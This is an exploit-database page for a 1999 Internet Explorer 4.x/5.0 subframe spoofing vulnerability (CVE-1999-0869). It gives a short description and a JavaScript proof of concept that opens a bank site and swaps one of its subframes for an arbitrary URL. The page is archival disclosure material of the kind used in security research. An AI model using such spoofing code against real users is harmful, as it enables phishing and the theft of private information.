[] NeoSense
E X P L O I T S
title author type platform port cve id

Microsoft Internet Explorer 4.1/5.0/4.0.1 - Subframe Spoofing

Author: Georgi Guninski
type: remote
platform: windows
port: 
date_added: 1999-11-30 
date_updated: 2012-07-07 
verified: 1 
codes: CVE-1999-0869;OSVDB-7866 
tags: 
aliases:  
screenshot_url:  
application_url: 
Internet Explorer 4.1 for Windows 95/Windows 98/Windows NT 4,Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4,Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0 Subframe Spoofing Vulnerability

source: https://www.securityfocus.com/bid/855/info

IE's default security settings allow a malicious webpage to open a new browser, open another site's main frame in that new browser and then set any subframes to a URL of their choosing. This could lead to misappropriation of private information, among other problems.

<SCRIPT>
b=window.open("http://www.citybank.com");
function g()
{
b.frames[2].location="http://www.yahoo.com";
}
setTimeout("g()",6000);
</SCRIPT>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.